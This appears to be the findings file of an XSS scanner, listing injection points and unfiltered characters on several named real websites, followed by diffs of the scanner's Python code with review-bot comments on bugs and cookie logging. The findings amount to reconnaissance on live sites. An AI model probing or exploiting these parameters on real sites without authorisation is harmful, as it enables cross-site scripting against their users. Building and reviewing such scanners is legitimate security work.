URL: http://pommielvrjen.u.yuku.com/comment/view/id/220693
Unfiltered: "()=<>
Payload: "()=<>
Type: form
Injection point: form field names: vno, login, password
Line: <h1 class="mgr-logo-link"><a href="http://yuku.com">Yuku free message boards</a></h1><form action="" class="login-form" method="post"><div><input type="hidden" name="vno" value="r_7b3714174bc1c41046e57bd0a44bdc70"><input name="login" type="text" class="mgr-text" value="9zqjx"()=<>9zqjx"><label>Password:</label><input name="password" type="password" title="enter your password" class="mgr-text sliver-login-password">
URL: http://worktruckjobs.com/display-job/23/Demo-Job.html?page=1&searchId=1406272459.2538
Unfiltered: "()=<>
Payload: "()=<>
Type: url
Injection point: searchId
Line: <a href="http://worktruckjobs.com/display-job-map/?listing_id=23&amp;searchId=9zqjx"()=<>9zqjx&amp;view=map" onclick="popUpWindowIframe('http://worktruckjobs.com/display-job-map/?listing_id=23&amp;searchId=9zqjx"()=<>9zqjx&amp;view=map&amp;lightbox=1', 810, 710, 'Map'); return false;">Map View</a>
Line: <a href="http://worktruckjobs.com/display-job/23/Demo-Job.html?action=search&amp;searchId=9zqjx"()=<>9zqjx&amp;page=1#listing_23">Back to Results</a>
Line: <a href="http://worktruckjobs.com/find-jobs/?searchId=9zqjx"()=<>9zqjx">Modify Search</a>
URL: http://worktruckjobs.com/display-job/23/Demo-Job.html?page=1&searchId=1406272459.2538
Unfiltered: '"(){}[];
Payload: %27%22%28%29%7B%7D%5B%5D%3B
Type: url
Injection point: searchId
Line: <a href="http://worktruckjobs.com/display-job-map/?listing_id=23&amp;searchId=9zqjx'"(){}[];9zqjx&amp;view=map" onclick="popUpWindowIframe('http://worktruckjobs.com/display-job-map/?listing_id=23&amp;searchId=9zqjx'"(){}[];9zqjx&amp;view=map&amp;lightbox=1', 810, 710, 'Map'); return false;">Map View</a>
Line: <a href="http://worktruckjobs.com/display-job/23/Demo-Job.html?action=search&amp;searchId=9zqjx'"(){}[];9zqjx&amp;page=1#listing_23">Back to Results</a>
Line: <a href="http://worktruckjobs.com/find-jobs/?searchId=9zqjx'"(){}[];9zqjx">Modify Search</a>
URL: http://worktruckjobs.com/display-job/23/Demo-Job.html?page=1&searchId=1406272459.2538
Unfiltered: "()=<>
Payload: "()=<>
Type: url
Injection point: page
Line: <a href="http://worktruckjobs.com/display-job/23/Demo-Job.html?action=search&amp;searchId=1406272459.2538&amp;page=9zqjx"()=<>9zqjx#listing_23">Back to Results</a>
URL: http://worktruckjobs.com/display-job/23/Demo-Job.html?page=1&searchId=1406272459.2538
Unfiltered: '"(){}[];
Payload: '"(){}[];
Type: url
Injection point: searchId
Line: <a href="http://worktruckjobs.com/display-job-map/?listing_id=23&amp;searchId=9zqjx'"(){}[];9zqjx&amp;view=map" onclick="popUpWindowIframe('http://worktruckjobs.com/display-job-map/?listing_id=23&amp;searchId=9zqjx'"(){}[];9zqjx&amp;view=map&amp;lightbox=1', 810, 710, 'Map'); return false;">Map View</a>
Line: <a href="http://worktruckjobs.com/display-job/23/Demo-Job.html?action=search&amp;searchId=9zqjx'"(){}[];9zqjx&amp;page=1#listing_23">Back to Results</a>
Line: <a href="http://worktruckjobs.com/find-jobs/?searchId=9zqjx'"(){}[];9zqjx">Modify Search</a>
URL: http://worktruckjobs.com/display-job/23/Demo-Job.html?page=1&searchId=1406272459.2538
Unfiltered: '"(){}[];
Payload: %27%22%28%29%7B%7D%5B%5D%3B
Type: url
Injection point: page
Line: <a href="http://worktruckjobs.com/display-job/23/Demo-Job.html?action=search&amp;searchId=1406272459.2538&amp;page=9zqjx'"(){}[];9zqjx#listing_23">Back to Results</a>
URL: http://help.yandex.com/mail/
Unfiltered: "()=
Payload: "()=<>
Type: form
Injection point: form field names: text
Line: <title>Search results for "9zqjx"()=&lt;&gt;9zqjx" — Yandex.Help</title>
Line: <span class="b-form-input__box"><input value='9zqjx"()=&lt;&gt;9zqjx' class="b-form-input__input" id="search" name="text" maxlength="400" tabindex="1"><span class="b-form-input__clear b-form-input__clear_visibility_visible"></span></span>
Line: <div class="b-serp"><div class="b-page-title b-page-title_type_shifted"><h1 class="b-page-title__title">Search results for "9zqjx"()=&lt;&gt;9zqjx"</h1></div><div class="b-static-text">
URL: http://help.yandex.com/webmaster/controlling-robot/robots-txt.xml
Unfiltered: "()=
Payload: "()=<>
Type: form
Injection point: form field names: text
Line: <title>Search results for "9zqjx"()=&lt;&gt;9zqjx" — Yandex.Help</title>
Line: <span class="b-form-input__box"><input value='9zqjx"()=&lt;&gt;9zqjx' class="b-form-input__input" id="search" name="text" maxlength="400" tabindex="1"><span class="b-form-input__clear b-form-input__clear_visibility_visible"></span></span>
Line: <div class="b-serp"><div class="b-page-title b-page-title_type_shifted"><h1 class="b-page-title__title">Search results for "9zqjx"()=&lt;&gt;9zqjx"</h1></div><div class="b-static-text">
URL: http://help.yandex.com/webmaster/controlling-robot/robots-txt.xml
Unfiltered: '"(){}[];
Payload: '"(){}[];
Type: form
Injection point: form field names: text
Line: <title>Search results for "9zqjx'"(){}[];9zqjx" — Yandex.Help</title>
Line: <div class="b-serp"><div class="b-page-title b-page-title_type_shifted"><h1 class="b-page-title__title">Search results for "9zqjx'"(){}[];9zqjx"</h1></div><div class="b-static-text">
URL: https://helpx.adobe.com/jp/creative-cloud-enterprise.html
Unfiltered: ";
Payload: %27%22%28%29%7B%7D%5B%5D%3B
Type: form
Injection point: form field names: area, q, y, lr, hl, searchterm, x, lbl
URL: http://kadira.com/blog.php?CA=Abril+2006&DAT=April+2006
Unfiltered: "()=<>
Payload: %22%28%29%3D%3C%3E
Type: url
Injection point: CA
Line: <title>El Blog. Entradas - 9zqjx"()=<>9zqjx</title>
Line: <meta name="description" content="Blog ergonómico de Kadira, entradas realizadas en 9zqjx"()=<>9zqjx." />
Line: <h1>9zqjx"()=<>9zqjx - El blog de ergonomía</h1>
URL: http://kadira.com/blog.php?CA=Abril+2014&DAT=April+2014
Unfiltered: "()=<>
Payload: "()=<>
Type: url
Injection point: CA
Line: <title>El Blog. Entradas - 9zqjx"()=<>9zqjx</title>
Line: <meta name="description" content="Blog ergonómico de Kadira, entradas realizadas en 9zqjx"()=<>9zqjx." />
Line: <h1>9zqjx"()=<>9zqjx - El blog de ergonomía</h1>
URL: http://kadira.com/blog.php?CAT=Ergonom%C3%ADa&IDcat=10&pageNum_Recordset1=0&totalRows_Recordset1=13
Unfiltered: "()=<>
Payload: %22%28%29%3D%3C%3E
Type: url
Injection point: CAT
Line: <title>El Blog. Entradas - 9zqjx"()=<>9zqjx</title>
Line: <meta name="description" content="Blog ergonómico de Kadira, entradas específicas en 9zqjx"()=<>9zqjx." />
Line: <h1>9zqjx"()=<>9zqjx - El blog de ergonomía</h1>
URL: http://kadira.com/blog.php?CAT=Ergonom%C3%ADa&IDcat=10&pageNum_Recordset1=0&totalRows_Recordset1=13
Unfiltered: "()=<>
Payload: "()=<>
Type: url
Injection point: CAT
Line: <title>El Blog. Entradas - 9zqjx"()=<>9zqjx</title>
Line: <meta name="description" content="Blog ergonómico de Kadira, entradas específicas en 9zqjx"()=<>9zqjx." />
Line: <h1>9zqjx"()=<>9zqjx - El blog de ergonomía</h1>
URL: https://google-gruyere.appspot.com/855589874918/snippets.gtl?uid=brie
Unfiltered: '"(){}[];
Payload: %27%22%28%29%7B%7D%5B%5D%3B
Type: url
Injection point: uid
Line: 9zqjx'"(){}[];9zqjx
Line: onclick='_refreshSnippets("855589874918", "9zqjx'"(){}[];9zqjx")'
Line: 9zqjx'"(){}[];9zqjx
URL: https://google-gruyere.appspot.com/855589874918/snippets.gtl?uid=brie
Unfiltered: '()=<>
Payload: '()=<>
Type: url
Injection point: uid
Line: 9zqjx'()=<>9zqjx
Line: onclick='_refreshSnippets("855589874918", "9zqjx'()=<>9zqjx")'
Line: 9zqjx'()=<>9zqjx
URL: http://kadira.com/blog.php?CAT=Ergonom%C3%ADa&IDcat=10&pageNum_Recordset1=1&totalRows_Recordset1=13
Unfiltered: "()=<>
Payload: %22%28%29%3D%3C%3E
Type: url
Injection point: CAT
Line: <title>El Blog. Entradas - 9zqjx"()=<>9zqjx</title>
Line: <meta name="description" content="Blog ergonómico de Kadira, entradas específicas en 9zqjx"()=<>9zqjx." />
Line: <h1>9zqjx"()=<>9zqjx - El blog de ergonomía</h1>
URL: http://kadira.com/blog.php?CAT=Ergonom%C3%ADa&IDcat=10&pageNum_Recordset1=1&totalRows_Recordset1=13
Unfiltered: "()=<>
Payload: "()=<>
Type: url
Injection point: CAT
Line: <title>El Blog. Entradas - 9zqjx"()=<>9zqjx</title>
Line: <meta name="description" content="Blog ergonómico de Kadira, entradas específicas en 9zqjx"()=<>9zqjx." />
Line: <h1>9zqjx"()=<>9zqjx - El blog de ergonomía</h1>
URL: http://kadira.com/blog.php?CA=Noviembre+2007&DAT=November+2007
Unfiltered: "()=<>
Payload: %22%28%29%3D%3C%3E
Type: url
Injection point: CA
Line: <title>El Blog. Entradas - 9zqjx"()=<>9zqjx</title>
Line: <meta name="description" content="Blog ergonómico de Kadira, entradas realizadas en 9zqjx"()=<>9zqjx." />
Line: <h1>9zqjx"()=<>9zqjx - El blog de ergonomía</h1>
URL: http://kadira.com/blog.php?CA=Mayo+2012&DAT=May+2012
Unfiltered: "()=<>
Payload: "()=<>
Type: url
Injection point: CA
Line: <title>El Blog. Entradas - 9zqjx"()=<>9zqjx</title>
Line: <meta name="description" content="Blog ergonómico de Kadira, entradas realizadas en 9zqjx"()=<>9zqjx." />
Line: <h1>9zqjx"()=<>9zqjx - El blog de ergonomía</h1>
URL: http://kadira.com/blog.php?CAT=Ergonom%C3%ADa&IDcat=10&pageNum_Recordset1=1&totalRows_Recordset1=13
Unfiltered: "()=<>
Payload: %22%28%29%3D%3C%3E
Type: url
Injection point: CAT
Line: <title>El Blog. Entradas - 9zqjx"()=<>9zqjx</title>
Line: <meta name="description" content="Blog ergonómico de Kadira, entradas específicas en 9zqjx"()=<>9zqjx." />
Line: <h1>9zqjx"()=<>9zqjx - El blog de ergonomía</h1>
URL: http://kadira.com/blog.php?CAT=Ergonom%C3%ADa&IDcat=10&pageNum_Recordset1=1&totalRows_Recordset1=13
Unfiltered: "()=<>
Payload: "()=<>
Type: url
Injection point: CAT
Line: <title>El Blog. Entradas - 9zqjx"()=<>9zqjx</title>
Line: <meta name="description" content="Blog ergonómico de Kadira, entradas específicas en 9zqjx"()=<>9zqjx." />
Line: <h1>9zqjx"()=<>9zqjx - El blog de ergonomía</h1>
URL: http://kadira.com/blog.php?CAT=Ergonom%C3%ADa&IDcat=10
Unfiltered: "()=<>
Payload: %22%28%29%3D%3C%3E
Type: url
Injection point: CAT
Line: <title>El Blog. Entradas - 9zqjx"()=<>9zqjx</title>
Line: <meta name="description" content="Blog ergonómico de Kadira, entradas específicas en 9zqjx"()=<>9zqjx." />
Line: <h1>9zqjx"()=<>9zqjx - El blog de ergonomía</h1>
URL: http://kadira.com/blog.php?CAT=Ergonom%C3%ADa&IDcat=10
Unfiltered: "()=<>
Payload: "()=<>
Type: url
Injection point: CAT
Line: <title>El Blog. Entradas - 9zqjx"()=<>9zqjx</title>
Line: <meta name="description" content="Blog ergonómico de Kadira, entradas específicas en 9zqjx"()=<>9zqjx." />
Line: <h1>9zqjx"()=<>9zqjx - El blog de ergonomía</h1>
URL: http://danmcinerney.org/headers.php
Unfiltered: ()=<>
Payload: ()=<>
Type: header
Injection point: Referer
Line: Referer: 9zqjx()=<>9zqjx <br />
URL: http://danmcinerney.org/headers.php
Unfiltered: ()=<>
Payload: ()=<>
Type: header
Injection point: User-Agent
Line: User-Agent: 9zqjx()=<>9zqjx <br />
URL: http://www.kadira.com/blog.php?CAT=Ergonom%C3%ADa&IDcat=10
Unfiltered: "()=<>
Payload: %22%28%29%3D%3C%3E
Type: url
Injection point: CAT
Line: <title>El Blog. Entradas - 9zqjx"()=<>9zqjx</title>
Line: <meta name="description" content="Blog ergonómico de Kadira, entradas específicas en 9zqjx"()=<>9zqjx." />
Line: <h1>9zqjx"()=<>9zqjx - El blog de ergonomía</h1>
URL: http://www.kadira.com/blog.php?CAT=Ergonom%C3%ADa&IDcat=10
Unfiltered: "()=<>
Payload: "()=<>
Type: url
Injection point: CAT
Line: <title>El Blog. Entradas - 9zqjx"()=<>9zqjx</title>
Line: <meta name="description" content="Blog ergonómico de Kadira, entradas específicas en 9zqjx"()=<>9zqjx." />
Line: <h1>9zqjx"()=<>9zqjx - El blog de ergonomía</h1>


@@ -27,16 +27,34 @@ class XSS_pipeline(object):
# If the injection param, the url up until the injected param and the payload
# are all the same as a previous item, then don't bother creating the item
# Match injection points
# Match tags where injection point was found
if item['inj_point'] == i['inj_point']:
# Match the URL up until the injected param
injected_var = item['inj_point']+'='
if item['url'].split(injected_var, 1)[0] == i['url'].split(injected_var, 1)[0]:
# Match the URL up until the params
if item['url'].split('?', 1)[0] == i['url'].split('?', 1)[0]:
# Match the payload
if item['xss_payload'] == i['xss_payload']:
raise DropItem('Duplicate item found: %s' % item['url'])
# Match the unfiltered characters
if item['unfiltered'] == i['unfiltered']:
raise DropItem('Duplicate item found: %s' % item['url'])
self.url_param_xss_items.append(item)
self.write_to_file(item)
return item
def write_to_file(self, item):
with open('formatted_vulns.txt', 'a+') as f:
f.write('\n')
f.write('URL: '+item['url']+'\n')
f.write('Unfiltered: '+item['unfiltered']+'\n')
f.write('Payload: '+item['xss_payload']+'\n')
f.write('Type: '+item['xss_type']+'\n')
f.write('Injection point: '+item['inj_point']+'\n')
for line in item['line']:
f.write('Line: '+line[1]+'\n')
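Review bot: `write_to_file` iterates `item['line']` unconditionally and indexes `line[1]`, but the spider's fall-through branch assigns `item['line'] = self.get_inj_line(...)`, and `get_inj_line` only returns its list when at least one line matched (its tail lies outside the hunk, so a `None` return there is inferred rather than shown); a `None` would raise `TypeError` inside the pipeline and the finding would be lost silently. Guard the loop, e.g. `for _, text in (item.get('line') or []): f.write('Line: '+text+'\n')`. The concatenations `'Unfiltered: '+item['unfiltered']` and `'Injection point: '+item['inj_point']` fail the same way if either field is ever unset or `None`, so a `str()` or `.get(..., '')` default keeps the report writer from aborting on a partial item. The enclosing method of the dedupe logic starts before this hunk.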


@@ -28,7 +28,7 @@ ITEM_PIPELINES = {'xsscrapy.pipelines.XSS_pipeline':100} # Look into what the 10
FEED_FORMAT = 'csv'
FEED_URI = 'vulnerable-urls.txt'
#COOKIES_DEBUG = True
COOKIES_DEBUG = True
# Test for injection via headers
#DEFAULT_REQUEST_HEADERS = {'Referer': '9zqjx', 'User-Agent':'9zqjx'}
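Review bot: Uncommenting `COOKIES_DEBUG = True` makes Scrapy's cookies middleware log every `Cookie` and `Set-Cookie` header at DEBUG level, and this spider accepts `user`/`pw` arguments for authenticated crawls, so the target's session cookies would end up in the crawl log and in any log file it is redirected to. Committed settings should keep the flag off and mark it as a local toggle: `#COOKIES_DEBUG = True  # logs every cookie incl. authenticated sessions; enable locally only`. If cookie logging is needed for the cookie-injection work noted elsewhere in the commit, gate it on a spider argument rather than a repository default.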


@@ -1,3 +1,5 @@
# -- coding: utf-8 --
from scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor
from scrapy.contrib.spiders import CrawlSpider, Rule
from scrapy.selector import Selector
@@ -24,7 +26,7 @@ import requests
#
#w3lib.url.safe_url_string = new_safe_url_string
#from IPython import embed
from IPython import embed
__author__ = 'Dan McInerney danhmcinerney@gmail.com'
@@ -34,7 +36,8 @@ cookie
data control?
TO DO
-add DOM detection (pretty easy, just use those regexs from google domwikixss)
-add DOM detection or static js analysis (check retire.js project)
-the variable payload starts as the encoded payload and is eventually unescaped but not everuwhere?
-cleanup xss_chars_finder(self, response)
-prevent Requests from being URL encoded (line 57 of __init__ in Requests class)
@@ -58,6 +61,8 @@ class XSSspider(CrawlSpider):
self.redir_pld = 'JaVAscRIPT:prompt(99)'
#attr_pld = generated once injection points are found (requires checking if single or double quotes ends html attribute values)
self.form_requests_made = set()
self.header_requests_made = set()
self.url_requests_made = set()
self.login_user = kwargs.get('user')
self.login_pass = kwargs.get('pw')
@@ -68,6 +73,7 @@ class XSSspider(CrawlSpider):
base_url = u.scheme+'://'+u.hostname
robots_url = base_url+'/robots.txt'
robot_req = [Request(robots_url, callback=self.robot_parser, meta={'base_url':base_url})]
reqs = self.parse_resp(response)
reqs += robot_req
return reqs
@@ -129,6 +135,9 @@ class XSSspider(CrawlSpider):
payload = self.test_str
payloads = [payload]
# Get any cookies (logic of this still needs working out)
#cookies = response.headers.getlist('Set-Cookie')
# Edit a few select headers with injection string and resend request
headers = ['Referer', 'User-Agent']
header_reqs = self.make_header_reqs(orig_url, payloads, headers, quote_enclosure, None)
@@ -266,6 +275,12 @@ class XSSspider(CrawlSpider):
for params in modded_params[payload]:
joinedParams = urllib.urlencode(params, doseq=1) # doseq maps the params back together
newURL = urllib.unquote(protocol+hostname+path+'?'+joinedParams)
# Prevent URL dupes since we have dont_filter set to True for payloaded urls
if set(newURL).issubset(self.url_requests_made):
continue
self.url_requests_made.add(newURL)
for p in params:
if p[1] == payload:
changed_value = p[0]
@@ -273,8 +288,6 @@ class XSSspider(CrawlSpider):
if len(payloaded_urls) > 0:
return payloaded_urls
else:
return
def getURLparams(self, url):
''' Parse out the URL parameters '''
@@ -374,11 +387,11 @@ class XSSspider(CrawlSpider):
def xss_str_generator(self, injections, quote_enclosure, inj_type):
''' This is where the injection points are analyzed and specific payloads are created '''
event_attrs = self.event_attributes()
attr_pld = quote_enclosure+self.tag_pld
payloads = []
for i in injections:
# print i
line, tag, attr, attr_val = self.parse_injections(i)
if attr:
@@ -386,6 +399,10 @@ class XSSspider(CrawlSpider):
if attr == 'href' and attr_val == self.test_str:
if self.redir_pld not in payloads:
payloads.append(self.redir_pld)
# Test for javacsript running attributes
if attr in event_attrs:
if self.js_pld not in payloads:
payloads.append(self.js_pld)
# Test for normal attribute-based XSS (needs either ' or " to be unescaped depending on which char the value is wrapped in
if attr_pld not in payloads:
@@ -405,11 +422,18 @@ class XSSspider(CrawlSpider):
if self.tag_pld in payloads and attr_pld in payloads:
payloads.remove(self.tag_pld)
for p in payloads:
if 'h' in payloads:
print '***PAYLOADS:', p
if inj_type == 'url':
payloads.append(urllib.quote_plus(payloads[0]))
payloads = self.delim_payloads(payloads)
if len(payloads) > 0:
for p in payloads:
if 'h' in payloads:
print '***PAYLOADS:', p
return payloads
else:
return
@@ -430,7 +454,6 @@ class XSSspider(CrawlSpider):
# namely: meta tag with content attr, a tag with href attribute (onmouseover payload), option tag any attr (onmouseover payload)
item = vuln()
event_attrs = self.event_attributes()
xss_type = response.meta['type']
orig_url = response.meta['orig_url']
injections = response.meta['injections']
@@ -440,9 +463,11 @@ class XSSspider(CrawlSpider):
body = response.body
# Regex: ( ) mean group 1 is within the parens, . means any char, {1,25} means match any char 1 to 25 times
chars_between_delims = '%s(.{1,25})%s' % (self.test_str, self.test_str) # self.js_pld is 21 chars, so added a little extra space
orig_payload = response.meta['payload'].strip(self.test_str) # xss char payload
payload = self.unescape_payload(orig_payload)
inj_num = len(injections)
mismatch = False
orig_payload = response.meta['payload'].strip(self.test_str) # xss char payload
escaped_payload = self.unescape_payload(orig_payload)
break_tag_chars = set(['>', '<',])
break_attr_chars = set([quote_enclosure])
@@ -451,61 +476,53 @@ class XSSspider(CrawlSpider):
matches = re.findall(chars_between_delims, body)
if matches:
xss_num = len(matches)
else:
xss_num = 0
if xss_num > 0:
if xss_num != inj_num:
item['xss_type'] = 'Error '+str(xss_type)
item['inj_point'] = 'Error '+str(inj_point)
item['xss_payload'] = 'Error '+str(orig_payload)
item['url'] = 'Error '+str(orig_url)
mismatch = True
err = ('Mismatch between harmless injection count and payloaded injection count: %d vs %d' % (inj_num, xss_num))
item['error'] = err
unfiltered_chars = self.get_unfiltered_chars(matches, payload)
if unfiltered_chars:
for idx, i in enumerate(injections):
line, tag, attr, attr_val = self.parse_injections(i)
for idx, match in enumerate(matches):
unfiltered_chars = self.get_unfiltered_chars(match, escaped_payload)
if unfiltered_chars:
try:
c = unfiltered_chars[idx] # c = set of characters found at injection point
line, tag, attr, attr_val = self.parse_injections(injections[idx])
except IndexError:
# Mismatch in num of test injections and num of payloads found
# I feel like I could put a break instead of a continue here but I am so fearful of false negatives
continue
break
joined_chars = ''.join(c)
chars = set(c)
line = self.get_inj_line(body, joined_chars, item)
joined_chars = ''.join(unfiltered_chars)
chars = set(joined_chars)
line_html = self.get_inj_line(body, match, item)
###### XSS RULES ########
# Redirect
if self.redir_pld.lower() == payload.lower(): #redir
if 'javascript:prompt(99)' == joined_chars.lower():
return self.make_item(joined_chars, xss_type, orig_payload, tag, orig_url, inj_point, line, item)
if 'javascript:prompt(99)' == joined_chars.lower(): # redir
return self.make_item(joined_chars, xss_type, orig_payload, tag, orig_url, inj_point, line_html, item)
# JS breakout
if self.js_pld == payload: #js chars
if self.js_pld == escaped_payload: #js chars
if break_js_chars.issubset(chars):
if '\\' not in chars:
return self.make_item(joined_chars, xss_type, orig_payload, tag, orig_url, inj_point, line, item)
return self.make_item(joined_chars, xss_type, orig_payload, tag, orig_url, inj_point, line_html, item)
# Attribute breakout
if attr:
if quote_enclosure in payload:
# Must pass a string search for the test+unesc_payload+test in at least one line of html and cannot be a mismatch
#if line_html and mismatch == False:
if quote_enclosure in escaped_payload:
if break_attr_chars.issubset(chars):
return self.make_item(joined_chars, xss_type, orig_payload, tag, orig_url, inj_point, line, item)
return self.make_item(joined_chars, xss_type, orig_payload, tag, orig_url, inj_point, line_html, item)
# Tag breakout
else:
if '<' and '>' in payload:
if '<' and '>' in escaped_payload:
if break_tag_chars.issubset(chars):
return self.make_item(joined_chars, xss_type, orig_payload, tag, orig_url, inj_point, line, item)
return self.make_item(joined_chars, xss_type, orig_payload, tag, orig_url, inj_point, line_html, item)
# Check the entire body for exact match
if payload in body:
#item['line'] = self.get_inj_line(body, payload, item)
if escaped_payload in body:
item['line'] = self.get_inj_line(body, escaped_payload, item)
item['xss_payload'] = orig_payload
item['unfiltered'] = payload
item['inj_point'] = inj_point
@@ -517,8 +534,12 @@ class XSSspider(CrawlSpider):
lines = []
html_lines = body.splitlines()
for idx, line in enumerate(html_lines):
line = line.strip()
if payload in line:
lines += (idx, line)
if len(line) > 500:
line = line[:200]+'...'
num_txt = (idx, line)
lines.append(num_txt)
if len(lines) > 0:
return lines
@@ -526,7 +547,7 @@ class XSSspider(CrawlSpider):
def make_item(self, joined_chars, xss_type, orig_payload, tag, orig_url, inj_point, line, item):
''' Create the vulnerable item '''
#item['line'] = line
item['line'] = line
item['xss_type'] = xss_type
item['xss_payload'] = orig_payload
item['unfiltered'] = joined_chars
@@ -546,23 +567,23 @@ class XSSspider(CrawlSpider):
return line, tag, attr, attr_val
def get_unfiltered_chars(self, matches, payload):
def get_unfiltered_chars(self, match, escaped_payload):
''' Check for the special chars and append them to a master list of tuples, one tuple per injection point '''
unfiltered_chars = []
found_chars = []
for m in matches:
for c in payload:
if c in m:
found_chars.append(c)
if len(found_chars) > 0:
unfiltered_chars.append(found_chars)
found_chars = []
# Make sure js payloads remove escaped ' and "
#if escaped_payload == self.js_pld:
escaped_chars = re.findall(r'\\(.)', match)
for escaped_char in escaped_chars:
if escaped_char not in ['x', 'u']: # x and u for hex and unicode \x43, \u0022
match = match.replace(escaped_char, '')
for c in escaped_payload:
if c in match:
unfiltered_chars.append(c)
if len(unfiltered_chars) > 0:
return unfiltered_chars
else:
return
def unescape_payload(self, payload):
''' Unescape the various payload encodings (html and url encodings)'''
@@ -572,6 +593,7 @@ class XSSspider(CrawlSpider):
payload = urllib.unquote_plus(payload)
# only html-encoded payloads will have & in them
payload = HTMLParser.HTMLParser().unescape(payload)
return payload
def parse_attr_xpath(self, xpath):
@@ -646,28 +668,37 @@ class XSSspider(CrawlSpider):
return event_attributes
def make_url_reqs(self, orig_url, payloaded_urls, quote_enclosure, injections):
''' Make the URL requests and filter out dupes '''
reqs = [Request(url[0],
meta={'type':'url',
'inj_point':url[1],
'orig_url':orig_url,
'payload':url[2],
'quote':quote_enclosure},
dont_filter = True)
'quote':quote_enclosure})
for url in payloaded_urls] # Meta is the payload
reqs = self.add_callback(injections, reqs)
for url in payloaded_urls:
if url[2] == self.test_str:
break
print 'payload:', url[2]
if len(reqs) > 0:
for r in reqs:
# Make sure we're only showing payloaded URLs, not tester URLs
if r.callback == self.xss_chars_finder:
self.log('Sending payloaded URL: '+r.url)
else:
break
reqs = self.add_callback(injections, reqs)
reqs = self.add_dupe_filter(reqs)
if reqs:
return reqs
else:
return
def add_dupe_filter(self, reqs):
for r in reqs:
# Make sure we're only showing payloaded URLs, not tester URLs
if r.callback == self.xss_chars_finder:
# Don't filter payloaded ones, but do filter reqs with the payload == self.test_str
r.dont_filter = True
self.log('Sending payloaded URL: '+r.url)
else:
break
return reqs
def make_header_reqs(self, url, payloads, headers, quote_enclosure, injections):
''' Generate header requests '''
@@ -682,6 +713,7 @@ class XSSspider(CrawlSpider):
dont_filter=True)
for header in headers for payload in payloads]
reqs = self.remove_header_dupes(reqs)
reqs = self.add_callback(injections, reqs)
if len(reqs) > 0:
@@ -696,6 +728,25 @@ class XSSspider(CrawlSpider):
else:
return
def remove_header_dupes(self, reqs):
''' Put all header requests made into a tuple of (url, header, payload) and
compare new header requests to this master set to prevent dupes '''
new_reqs =[]
for r in reqs:
for h in r.headers:
header = h # Referer or User-Agent
break
payload = r.headers[header]
u_h_p = (r.url, header, payload)
if set(u_h_p).issubset(self.header_requests_made):
continue
else:
self.header_requests_made.add(u_h_p)
new_reqs.append(r)
if len(reqs) > 0:
return new_reqs
def add_callback(self, injections, reqs):
''' Add the callback to the requests depending on if it's a test req or payloaded req '''
@@ -795,7 +846,3 @@ class XSSspider(CrawlSpider):
return reqs
else:
return
############################################################################################
#if not p == self.redir_pld:
# payload_list.append(self.test_str+urllib.quote_plus(p)+self.test_str)
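Review bot: The new duplicate filter in the URL-request builder never suppresses anything: `set(newURL)` is the set of characters in the URL string, and `.issubset(self.url_requests_made)` asks whether each of those characters is itself a member of the set of previously seen URLs, which is false for any real URL. The check should read `if newURL in self.url_requests_made: continue`. The same construction recurs in `remove_header_dupes`, `if set(u_h_p).issubset(self.header_requests_made)`, which should be `if u_h_p in self.header_requests_made`; as written both tracking sets grow on every call while every payloaded URL and header request is still re-sent, and the new `dont_filter = True` in `add_dupe_filter` removes Scrapy's own dedupe as the backstop. The loop containing the first check begins before its hunk.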